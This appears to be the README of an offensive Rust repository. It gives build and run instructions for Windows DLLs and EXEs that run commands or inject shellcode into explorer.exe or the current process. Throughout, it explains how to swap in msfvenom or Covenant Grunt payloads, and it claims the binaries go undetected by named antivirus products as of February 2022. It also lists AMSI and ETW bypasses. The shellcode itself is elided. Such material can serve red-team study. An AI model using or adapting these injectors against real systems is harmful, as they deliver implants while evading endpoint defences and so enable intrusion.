This repository is inspired by different Rust repositories in order to define my own Offensive Windows Rust cheatsheet and weapons. The entire project has been developed and compiled on a Linux machine.
You can find 3 different projects inside 01_DLLs/
$ ls 01_DLLs
code_execution msgbox shellcode_CreateRemoteThread shellcode_CreateThread
Launch a simple Windows prompt.
$ cd /01_DLLs/msgbox
$ ls
Cargo.toml src
$ cargo build --target x86_64-pc-windows-gnu --lib --release
This generate a .dll file with the export function exec. It is located at: target/x86_64-pc-windows-gnu/release/
$ ls
build deps examples incremental libmsgbox_dll.dll.a msgbox_dll.d msgbox_dll.dll
For execute it in Windows:
C:\>rundll32 msgbox_dll.dll,exec
Execute commands from a new cmd process.
$ cd 01_DLLs/code_execution
$ ls
Cargo.toml src
$ cargo build --target x86_64-pc-windows-gnu --lib --release
This generate a .dll file with the export function exec. It is located at: target/x86_64-pc-windows-gnu/release/
$ ls
build code_execution_dll.d code_execution_dll.dll deps examples incremental libcode_execution_dll.dll.a
For execute it in Windows:
C:\>rundll32 code_execution_dll.dll,exec
To change the purpose and/or command execution of the DLL, open lib.rs modify the following line and recompile:
let output = Command::new("cmd").args(&["/C", "calc.exe"]).output().expect("failed to execute process");
[NO AV DETECTION (DEFENDER, ESET, FSECURE, MCAFEE, CORTEX) - 15/02/2022]
Launch a shellcode inside a especific process. This example execute a shellcode generated by msfvenom which launch calc.exe.
$ cd 01_DLLs/shellcode_CreateRemoteThread
$ ls
Cargo.toml src
$ cargo build --target x86_64-pc-windows-gnu --lib --release
This generate a .dll file with the export function exec. It is located at: target/x86_64-pc-windows-gnu/release/
$ ls
build deps examples incremental libshellcodeshellcode_create_remote_thread_dll.dll.a shellcode_create_remote_thread_dll.d shellcode_create_remote_thread_dll.dll
For execute it in Windows:
C:\>rundll32 shellcode_create_remote_thread_dll.dll,exec <process_name>
If the process name is not specified, the shellcode is injected into the explorer.exe process by default.
AV DETECTIONS (with Covenant Grunt shellcode)
To change the purpose and/or shellcode of the DLL, open lib.rs modify the following line and recompile:
let shellcode:[u8;276] = [0xfc, 0x48, ... <blablabla>];
In addition, if you want to change default process for inject the shellcode, you can edit the following line in lib.rs and recompile:
let mut processname = "explorer.exe";
[NO AV DETECTION (DEFENDER, ESET, FSECURE, MCAFEE, CORTEX) - 15/02/2022]
Launch a shellcode inside the current process. This example execute a shellcode generated by msfvenom which launch calc.exe.
$ cd 01_DLLs/shellcode_CreateThread
$ ls
Cargo.toml src
$ cargo build --target x86_64-pc-windows-gnu --lib --release
This generate a .dll file with the export function exec. It is located at: target/x86_64-pc-windows-gnu/release/
$ ls
build deps examples incremental libshellcode_createThread_dll.dll.a shellcode_createThread_dll.d shellcode_createThread_dll.dll
For execute it in Windows:
C:\>rundll32 shellcode_createThread_dll.dll,exec
To change the purpose and/or shellcode of the DLL, open lib.rs modify the following line and recompile:
let shellcode:[u8;276] = [0xfc, 0x48, ... <blablabla>];
NOTE: you must specify shellcode length.
Launch a simple Windows prompt.
$ cd /02_EXEs/msgbox
$ ls
Cargo.toml src
$ cargo build --target x86_64-pc-windows-gnu --release
This generate a .exe file. It is located at: target/x86_64-pc-windows-gnu/release/
$ ls
build deps examples incremental msgbox_exe.d msgbox_exe.exe
For execute it in Windows:
C:\>msgbox_exe.exe
Execute commands from a new cmd process.
$ cd 02_EXEs/code_execution
$ ls
Cargo.toml src
$ cargo build --target x86_64-pc-windows-gnu --release
This generate a .exe file. It is located at: target/x86_64-pc-windows-gnu/release/
$ ls
build code_execution_exe.d code_execution_exe.exe deps examples incremental
For execute it in Windows:
C:\>code_execution_exe.exe
To change the purpose and/or command execution of the EXE, open main.rs modify the following line and recompile:
let output = Command::new("cmd").args(&["/C", "calc.exe"]).output().expect("failed to execute process");
[NO AV DETECTION (DEFENDER, ESET, FSECURE, MCAFEE, CORTEX) - 15/02/2022]
Launch a shellcode inside a especific process. This example execute a shellcode generated by msfvenom which launch calc.exe.
$ cd 02_EXEs/shellcode_CreateRemoteThread
$ ls
Cargo.toml src
$ cargo build --target x86_64-pc-windows-gnu --release
This generate a .exe file. It is located at: target/x86_64-pc-windows-gnu/release/
$ ls
build deps examples incremental shellcode_create_remote_thread_exe.d shellcode_create_remote_thread_exe.exe
For execute it in Windows:
C:\>shellcode_create_remote_thread_exe.exe <process_name>
If the process name is not specified, the shellcode is injected into the explorer.exe process by default.
AV DETECTIONS (with Covenant Grunt shellcode)
To change the purpose and/or shellcode of the DLL, open main.rs modify the following line and recompile:
let shellcode:[u8;276] = [0xfc, 0x48, ... <blablabla>];
In addition, if you want to change default process for inject the shellcode, you can edit the following line in main.rs and recompile:
let mut processname = "explorer.exe";
[NO AV DETECTION (DEFENDER, ESET, FSECURE, MCAFEE, CORTEX) - 15/02/2022]
Launch a shellcode inside the current process. This example execute a shellcode generated by msfvenom which launch calc.exe.
$ cd 02_EXEs/shellcode_CreateThread
$ ls
Cargo.toml src
$ cargo build --target x86_64-pc-windows-gnu --release
This generate a .exe file. It is located at: target/x86_64-pc-windows-gnu/release/
$ ls
build deps examples incremental shellcode_createThread_exe.d shellcode_createThread_exe.exe
For execute it in Windows:
C:\>shellcode_createThread_exe.exe
To change the purpose and/or shellcode of the DLL, open main.rs modify the following line and recompile:
let shellcode:[u8;276] = [0xfc, 0x48, ... <blablabla>];
NOTE: you must specify shellcode length.
- AMSI Bypass
- ETW Bypass
- ETW Patch
- OpSec
- Hell'sGate Rust Implementation
Interesting links for other offensive Rust project: